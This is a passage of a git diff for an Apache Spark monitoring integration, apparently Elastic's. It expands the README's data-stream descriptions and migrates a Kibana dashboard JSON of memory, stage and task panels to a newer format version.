name, runtime in milliseconds, and current status of the application. An example event for `application` looks as following: @@ -182,7 +215,7 @@ An example event for `application` looks as following: ### Driver -This is the `driver` data stream. +The `driver` data stream collects metrics related to the driver details, job durations, task execution, memory usage, executor status, and JVM metrics. An example event for `driver` looks as following: 
@@ -364,7 +397,7 @@ An example event for `driver` looks as following: ### Executor -This is the `executor` data stream. +The `executor` data stream collects metrics related to the operations, memory usage, garbage collection, file handling, and threadpool activity. An example event for `executor` looks as following: @@ -543,7 +576,7 @@ An example event for `executor` looks as following: ### Node -This is the `node` data stream. +The `node` data stream collects metrics related to the application count, waiting applications, worker metrics, executor count, core usage, and memory usage. An example event for `node` looks as following: diff --git a/packages/apache_spark/kibana/dashboard/apache_spark-b22dc960-a06c-11ec-8d4f-4fe3367a4156.json b/packages/apache_spark/kibana/dashboard/apache_spark-b22dc960-a06c-11ec-8d4f-4fe3367a4156.json index 9146422a21c..7b4bb5b4b65 100644 --- a/packages/apache_spark/kibana/dashboard/apache_spark-b22dc960-a06c-11ec-8d4f-4fe3367a4156.json +++ b/packages/apache_spark/kibana/dashboard/apache_spark-b22dc960-a06c-11ec-8d4f-4fe3367a4156.json 
@@ -1,2817 +1,3109 @@ { - "attributes": { - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "useMargins": true - }, - "panelsJSON": [ - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-d7cd2d50-503d-48cc-b9d1-77da873349ef", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "9857a495-b7e6-4893-93e6-f16c050e0e41", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "d59683b7-5f29-46b9-b01b-20b6aea422fe", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "d7cd2d50-503d-48cc-b9d1-77da873349ef": { - "columnOrder": [ - "f9bf9e21-aaa3-4948-9239-59ff6afb84d9", - "9401333e-571b-4999-9f50-405cad23cd1a" - ], - "columns": { - "9401333e-571b-4999-9f50-405cad23cd1a": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Memory", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "apache_spark.driver.memory.used" - }, - "f9bf9e21-aaa3-4948-9239-59ff6afb84d9": { - "customLabel": true, - "dataType": "date", - "isBucketed": true, - "label": "Timestamp", - "operationType": "date_histogram", - "params": { - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "9857a495-b7e6-4893-93e6-f16c050e0e41", - "key": "event.dataset", - "negate": false, - "params": { - "query": "apache_spark.driver" - }, - "type": "phrase" - }, - "query": { - 
"match_phrase": { - "event.dataset": "apache_spark.driver" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "d59683b7-5f29-46b9-b01b-20b6aea422fe", - "key": "apache_spark.driver.memory.used", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "apache_spark.driver.memory.used" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "curveType": "LINEAR", - "fittingFunction": "Linear", - "gridlinesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "9401333e-571b-4999-9f50-405cad23cd1a" - ], - "layerId": "d7cd2d50-503d-48cc-b9d1-77da873349ef", - "layerType": "data", - "position": "top", - "seriesType": "area_stacked", - "showGridlines": false, - "xAccessor": "f9bf9e21-aaa3-4948-9239-59ff6afb84d9", - "yConfig": [ - { - "axisMode": "left", - "forAccessor": "9401333e-571b-4999-9f50-405cad23cd1a" - } - ] - } - ], - "legend": { - "horizontalAlignment": "left", - "isInside": false, - "isVisible": true, - "position": "top", - "showSingleSeries": true, - "verticalAlignment": "top" - }, - "preferredSeriesType": "bar_stacked", - "title": "Empty XY chart", - "valueLabels": "hide", - "xTitle": "Timestamp", - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - }, - "yTitle": "Memory" - } + "id": "apache_spark-b22dc960-a06c-11ec-8d4f-4fe3367a4156", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.7.0" + }, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.7.0", + "updated_at": "2023-11-07T16:02:34.119Z", + "created_at": "2023-11-07T16:02:34.119Z", + "version": "Wzc5LDFd", + "attributes": { + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + 
"hidePanelTitles": false, + "syncColors": false, + "useMargins": true + }, + "panelsJSON": [ + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 17, + "i": "a3339a86-6f2b-4f1a-85b8-4619c417a110", + "w": 24, + "x": 0, + "y": 0 + }, + "panelIndex": "a3339a86-6f2b-4f1a-85b8-4619c417a110", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-d7cd2d50-503d-48cc-b9d1-77da873349ef", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "9857a495-b7e6-4893-93e6-f16c050e0e41", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "d59683b7-5f29-46b9-b01b-20b6aea422fe", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "d7cd2d50-503d-48cc-b9d1-77da873349ef": { + "columnOrder": [ + "f9bf9e21-aaa3-4948-9239-59ff6afb84d9", + "9401333e-571b-4999-9f50-405cad23cd1a" + ], + "columns": { + "9401333e-571b-4999-9f50-405cad23cd1a": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Memory", + "operationType": "last_value", + "params": { + "sortField": "@timestamp", + "showArrayValues": true + }, + "scale": "ratio", + "sourceField": "apache_spark.driver.memory.used" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "f9bf9e21-aaa3-4948-9239-59ff6afb84d9": { + "customLabel": true, + "dataType": "date", + "isBucketed": true, + "label": "Timestamp", + "operationType": "date_histogram", + "params": { + "interval": "auto", + "includeEmptyRows": true + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "9857a495-b7e6-4893-93e6-f16c050e0e41", + "key": "event.dataset", + "negate": false, + 
"params": { + "query": "apache_spark.driver" }, - "enhancements": {}, - "hidePanelTitles": false + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "apache_spark.driver" + } + } }, - "gridData": { - "h": 17, - "i": "a3339a86-6f2b-4f1a-85b8-4619c417a110", - "w": 24, - "x": 0, - "y": 0 + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "d59683b7-5f29-46b9-b01b-20b6aea422fe", + "key": "apache_spark.driver.memory.used", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "apache_spark.driver.memory.used" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "curveType": "LINEAR", + "fittingFunction": "Linear", + "gridlinesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "panelIndex": "a3339a86-6f2b-4f1a-85b8-4619c417a110", - "title": "Memory usage over time [Metrics Apache Spark]", - "type": "lens", - "version": "8.1.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-37e4c96b-3ba5-4033-9727-fad41089931d", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "8198873e-cf0a-43cf-8cd0-cd42a8df02c5", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "5df2fe94-f51b-44f9-b922-75663cb6996a", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "37e4c96b-3ba5-4033-9727-fad41089931d": { - "columnOrder": [ - "3c99f57f-933e-432c-8038-b95d81f3443f" - ], - "columns": { - "3c99f57f-933e-432c-8038-b95d81f3443f": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Number of Stages Completed", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - 
"scale": "ratio", - "sourceField": "apache_spark.driver.stages.completed_count" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "8198873e-cf0a-43cf-8cd0-cd42a8df02c5", - "key": "event.dataset", - "negate": false, - "params": { - "query": "apache_spark.driver" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "apache_spark.driver" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "5df2fe94-f51b-44f9-b922-75663cb6996a", - "key": "apache_spark.driver.stages.completed_count", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "apache_spark.driver.stages.completed_count" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "3c99f57f-933e-432c-8038-b95d81f3443f", - "colorMode": "None", - "layerId": "37e4c96b-3ba5-4033-9727-fad41089931d", - "layerType": "data" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "layers": [ + { + "accessors": [ + "9401333e-571b-4999-9f50-405cad23cd1a" + ], + "layerId": "d7cd2d50-503d-48cc-b9d1-77da873349ef", + "layerType": "data", + "position": "top", + "seriesType": "area_stacked", + "showGridlines": false, + "xAccessor": "f9bf9e21-aaa3-4948-9239-59ff6afb84d9", + "yConfig": [ + { + "axisMode": "left", + "forAccessor": "9401333e-571b-4999-9f50-405cad23cd1a" + } + ] + } + ], + "legend": { + "horizontalAlignment": "left", + "isInside": false, + "isVisible": true, + "position": "top", + "showSingleSeries": true, + "verticalAlignment": "top", + "legendSize": "auto" }, - "gridData": { - "h": 6, - "i": "2943002d-504e-4a30-a581-cd92fd621fe1", - "w": 8, - "x": 24, - "y": 0 + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + 
"valueLabels": "hide", + "xTitle": "Timestamp", + "yLeftExtent": { + "mode": "full" }, - "panelIndex": "2943002d-504e-4a30-a581-cd92fd621fe1", - "title": "Number of stages completed [Metrics Apache Spark]", - "type": "lens", - "version": "8.1.0" + "yRightExtent": { + "mode": "full" + }, + "yTitle": "Memory" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-bb1faa77-fef6-486c-aaf9-ec1411bdad13", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "603b47e3-4608-4094-8826-f923eab506a8", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "4a09ba27-dc93-43cf-be91-0632bc81cb47", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "bb1faa77-fef6-486c-aaf9-ec1411bdad13": { - "columnOrder": [ - "31520286-aa33-494c-8f42-412342c54e48" - ], - "columns": { - "31520286-aa33-494c-8f42-412342c54e48": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Number of Stages Skipped", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "apache_spark.driver.stages.skipped_count" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "603b47e3-4608-4094-8826-f923eab506a8", - "key": "event.dataset", - "negate": false, - "params": { - "query": "apache_spark.driver" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "apache_spark.driver" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "4a09ba27-dc93-43cf-be91-0632bc81cb47", - "key": "apache_spark.driver.stages.skipped_count", - "negate": false, - 
"type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "apache_spark.driver.stages.skipped_count" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "31520286-aa33-494c-8f42-412342c54e48", - "layerId": "bb1faa77-fef6-486c-aaf9-ec1411bdad13", - "layerType": "data" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Memory usage over time [Metrics Apache Spark]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 6, + "i": "2943002d-504e-4a30-a581-cd92fd621fe1", + "w": 8, + "x": 24, + "y": 0 + }, + "panelIndex": "2943002d-504e-4a30-a581-cd92fd621fe1", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-37e4c96b-3ba5-4033-9727-fad41089931d", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "8198873e-cf0a-43cf-8cd0-cd42a8df02c5", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "5df2fe94-f51b-44f9-b922-75663cb6996a", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "37e4c96b-3ba5-4033-9727-fad41089931d": { + "columnOrder": [ + "3c99f57f-933e-432c-8038-b95d81f3443f" + ], + "columns": { + "3c99f57f-933e-432c-8038-b95d81f3443f": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Number of Stages Completed", + "operationType": "last_value", + "params": { + "sortField": "@timestamp", + "showArrayValues": true + }, + "scale": "ratio", + "sourceField": "apache_spark.driver.stages.completed_count" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": 
"appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "8198873e-cf0a-43cf-8cd0-cd42a8df02c5", + "key": "event.dataset", + "negate": false, + "params": { + "query": "apache_spark.driver" }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 6, - "i": "784e4a18-20e7-48ef-8737-3a8a4643c4fe", - "w": 8, - "x": 32, - "y": 0 + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "apache_spark.driver" + } + } }, - "panelIndex": "784e4a18-20e7-48ef-8737-3a8a4643c4fe", - "title": "Number of stages skipped [Metrics Apache Spark]", - "type": "lens", - "version": "8.1.0" + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "5df2fe94-f51b-44f9-b922-75663cb6996a", + "key": "apache_spark.driver.stages.completed_count", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "apache_spark.driver.stages.completed_count" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "3c99f57f-933e-432c-8038-b95d81f3443f", + "colorMode": "None", + "layerId": "37e4c96b-3ba5-4033-9727-fad41089931d", + "layerType": "data", + "textAlign": "center", + "titlePosition": "bottom", + "size": "xl" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-6fc27bd4-9bc3-4233-9b1d-61df80582ad8", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "7e8d1def-772c-494c-b14e-eae96e52b074", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "c5b629cf-0836-49ff-a409-23cb47735f02", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "6fc27bd4-9bc3-4233-9b1d-61df80582ad8": { - "columnOrder": [ - 
"cd6cf970-b884-4c72-94a1-0104f46eda4a" - ], - "columns": { - "cd6cf970-b884-4c72-94a1-0104f46eda4a": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Number of Stages Failed", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "apache_spark.driver.stages.failed_count" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "7e8d1def-772c-494c-b14e-eae96e52b074", - "key": "event.dataset", - "negate": false, - "params": { - "query": "apache_spark.driver" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "apache_spark.driver" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "c5b629cf-0836-49ff-a409-23cb47735f02", - "key": "apache_spark.driver.stages.failed_count", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "apache_spark.driver.stages.failed_count" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "cd6cf970-b884-4c72-94a1-0104f46eda4a", - "layerId": "6fc27bd4-9bc3-4233-9b1d-61df80582ad8", - "layerType": "data" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Number of stages completed [Metrics Apache Spark]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 6, + "i": "784e4a18-20e7-48ef-8737-3a8a4643c4fe", + "w": 8, + "x": 32, + "y": 0 + }, + "panelIndex": "784e4a18-20e7-48ef-8737-3a8a4643c4fe", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": 
"indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-bb1faa77-fef6-486c-aaf9-ec1411bdad13", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "603b47e3-4608-4094-8826-f923eab506a8", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "4a09ba27-dc93-43cf-be91-0632bc81cb47", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "bb1faa77-fef6-486c-aaf9-ec1411bdad13": { + "columnOrder": [ + "31520286-aa33-494c-8f42-412342c54e48" + ], + "columns": { + "31520286-aa33-494c-8f42-412342c54e48": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Number of Stages Skipped", + "operationType": "last_value", + "params": { + "sortField": "@timestamp", + "showArrayValues": true + }, + "scale": "ratio", + "sourceField": "apache_spark.driver.stages.skipped_count" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "603b47e3-4608-4094-8826-f923eab506a8", + "key": "event.dataset", + "negate": false, + "params": { + "query": "apache_spark.driver" }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 6, - "i": "19bd059b-ca79-4fb0-b450-f8adeb8acc8f", - "w": 8, - "x": 40, - "y": 0 + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "apache_spark.driver" + } + } }, - "panelIndex": "19bd059b-ca79-4fb0-b450-f8adeb8acc8f", - "title": "Number of failed stages [Metrics Apache Spark]", - "type": "lens", - "version": "8.1.0" + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "4a09ba27-dc93-43cf-be91-0632bc81cb47", + "key": "apache_spark.driver.stages.skipped_count", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": 
"apache_spark.driver.stages.skipped_count" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "31520286-aa33-494c-8f42-412342c54e48", + "layerId": "bb1faa77-fef6-486c-aaf9-ec1411bdad13", + "layerType": "data", + "textAlign": "center", + "titlePosition": "bottom", + "size": "xl" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-df39527d-9339-47cb-9833-2e3d3ccc9c30", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "787550e5-b4cd-4892-babc-4f3d33c078ec", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "df39527d-9339-47cb-9833-2e3d3ccc9c30": { - "columnOrder": [ - "f4ed5f54-aae1-4dfe-82bf-e5d6181beef3", - "8c4d8d9d-46d4-4140-8aa7-5e8066fd577a", - "16d7f486-58c7-46a1-96ea-d2be88b82633", - "02d81198-17ac-4861-870d-c481ba9a7dad" - ], - "columns": { - "02d81198-17ac-4861-870d-c481ba9a7dad": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Completed", - "operationType": "max", - "scale": "ratio", - "sourceField": "apache_spark.driver.tasks.completed" - }, - "16d7f486-58c7-46a1-96ea-d2be88b82633": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Skipped", - "operationType": "max", - "scale": "ratio", - "sourceField": "apache_spark.driver.tasks.skipped" - }, - "8c4d8d9d-46d4-4140-8aa7-5e8066fd577a": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Failed", - "operationType": "max", - "scale": "ratio", - "sourceField": "apache_spark.driver.tasks.failed" - }, - "f4ed5f54-aae1-4dfe-82bf-e5d6181beef3": { - "customLabel": true, - "dataType": "date", - "isBucketed": true, - "label": "Timestamp", - "operationType": "date_histogram", - "params": { - 
"interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "787550e5-b4cd-4892-babc-4f3d33c078ec", - "key": "event.dataset", - "negate": false, - "params": { - "query": "apache_spark.driver" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "apache_spark.driver" - } - } - } - ], - "query": { - "language": "kuery", - "query": "apache_spark.driver.tasks.failed : * or apache_spark.driver.tasks.skipped : * or apache_spark.driver.tasks.completed : * " - }, - "visualization": { - "fittingFunction": "Linear", - "gridlinesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "8c4d8d9d-46d4-4140-8aa7-5e8066fd577a", - "16d7f486-58c7-46a1-96ea-d2be88b82633", - "02d81198-17ac-4861-870d-c481ba9a7dad" - ], - "layerId": "df39527d-9339-47cb-9833-2e3d3ccc9c30", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "xAccessor": "f4ed5f54-aae1-4dfe-82bf-e5d6181beef3", - "yConfig": [ - { - "axisMode": "left", - "color": "#d36086", - "forAccessor": "8c4d8d9d-46d4-4140-8aa7-5e8066fd577a" - }, - { - "axisMode": "left", - "forAccessor": "16d7f486-58c7-46a1-96ea-d2be88b82633" - }, - { - "axisMode": "left", - "color": "#54b399", - "forAccessor": "02d81198-17ac-4861-870d-c481ba9a7dad" - } - ] - } - ], - "legend": { - "isVisible": true, - "position": "top", - "showSingleSeries": true - }, - "preferredSeriesType": "area", - "title": "Empty XY chart", - "valueLabels": "hide", - "xTitle": "Timestamp", - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - }, - "yTitle": "Tasks" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + 
"hidePanelTitles": true, + "type": "lens" + }, + "title": "Number of stages skipped [Metrics Apache Spark]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 6, + "i": "19bd059b-ca79-4fb0-b450-f8adeb8acc8f", + "w": 8, + "x": 40, + "y": 0 + }, + "panelIndex": "19bd059b-ca79-4fb0-b450-f8adeb8acc8f", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-6fc27bd4-9bc3-4233-9b1d-61df80582ad8", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "7e8d1def-772c-494c-b14e-eae96e52b074", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "c5b629cf-0836-49ff-a409-23cb47735f02", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "6fc27bd4-9bc3-4233-9b1d-61df80582ad8": { + "columnOrder": [ + "cd6cf970-b884-4c72-94a1-0104f46eda4a" + ], + "columns": { + "cd6cf970-b884-4c72-94a1-0104f46eda4a": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Number of Stages Failed", + "operationType": "last_value", + "params": { + "sortField": "@timestamp", + "showArrayValues": true + }, + "scale": "ratio", + "sourceField": "apache_spark.driver.stages.failed_count" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "7e8d1def-772c-494c-b14e-eae96e52b074", + "key": "event.dataset", + "negate": false, + "params": { + "query": "apache_spark.driver" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 17, - "i": "f84a1cd9-1b4b-484e-87f7-953c2f645570", - "w": 24, - "x": 24, - "y": 6 + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "apache_spark.driver" + } + } }, - "panelIndex": 
"f84a1cd9-1b4b-484e-87f7-953c2f645570", - "title": "Number of Tasks over time [Metrics Apache Spark]", - "type": "lens", - "version": "8.1.0" + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "c5b629cf-0836-49ff-a409-23cb47735f02", + "key": "apache_spark.driver.stages.failed_count", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "apache_spark.driver.stages.failed_count" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "cd6cf970-b884-4c72-94a1-0104f46eda4a", + "layerId": "6fc27bd4-9bc3-4233-9b1d-61df80582ad8", + "layerType": "data", + "textAlign": "center", + "titlePosition": "bottom", + "size": "xl" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-efa9fcdd-f421-4c27-a85b-3a6d2512a09d", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "b8679379-0bbe-4028-b3e7-2cc0f84fa045", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "97467acb-706a-4078-ae1a-ac6ab5fd47d7", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "efa9fcdd-f421-4c27-a85b-3a6d2512a09d": { - "columnOrder": [ - "6962059b-392d-416f-a321-b0de80b841a7" - ], - "columns": { - "6962059b-392d-416f-a321-b0de80b841a7": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Max Memory (MB)", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "apache_spark.driver.memory.max_mem" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": 
"b8679379-0bbe-4028-b3e7-2cc0f84fa045", - "key": "event.dataset", - "negate": false, - "params": { - "query": "apache_spark.driver" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "apache_spark.driver" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "97467acb-706a-4078-ae1a-ac6ab5fd47d7", - "key": "apache_spark.driver.memory.max_mem", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "apache_spark.driver.memory.max_mem" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "6962059b-392d-416f-a321-b0de80b841a7", - "layerId": "efa9fcdd-f421-4c27-a85b-3a6d2512a09d", - "layerType": "data" - } + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Number of failed stages [Metrics Apache Spark]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 17, + "i": "f84a1cd9-1b4b-484e-87f7-953c2f645570", + "w": 24, + "x": 24, + "y": 6 + }, + "panelIndex": "f84a1cd9-1b4b-484e-87f7-953c2f645570", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", 